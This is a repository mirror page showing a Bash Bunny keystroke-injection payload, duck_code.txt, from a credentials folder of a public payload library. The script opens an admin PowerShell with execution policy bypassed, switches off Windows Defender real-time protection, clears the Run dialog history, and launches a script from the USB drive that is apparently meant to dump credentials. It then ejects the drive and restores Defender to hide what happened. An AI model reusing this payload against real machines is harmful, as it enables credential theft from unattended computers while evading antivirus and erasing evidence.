hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/credentials/ducked/duck_code.txt
scaery 9e54726597
Original from scaery/ducked (#456) 
* Create procdump.txt

* Create duck_code.txt

* Create run.ps1

* Create payload.txt
2021-12-16 11:52:13 -06:00

39 lines
870 B
Plaintext
Raw Blame History

DELAY 5000
GUI d
DELAY 1200
GUI r
DELAY 1200
STRING powershell -nologo -noni -ep bypass
CTRL-SHIFT ENTER
DELAY 2000
LEFT
DELAY 1000
ENTER
DELAY 1000
STRING mode con:cols=100 lines=1
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
ENTER
DELAY 200
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
ENTER
DELAY 35000
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
ENTER
DELAY 1000
STRING echo "Successful PWNd..."
ENTER
DELAY 1000
STRING eject
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
DELAY 1000
STRING exit
ENTER
Reference in New Issue View Git Blame Copy Permalink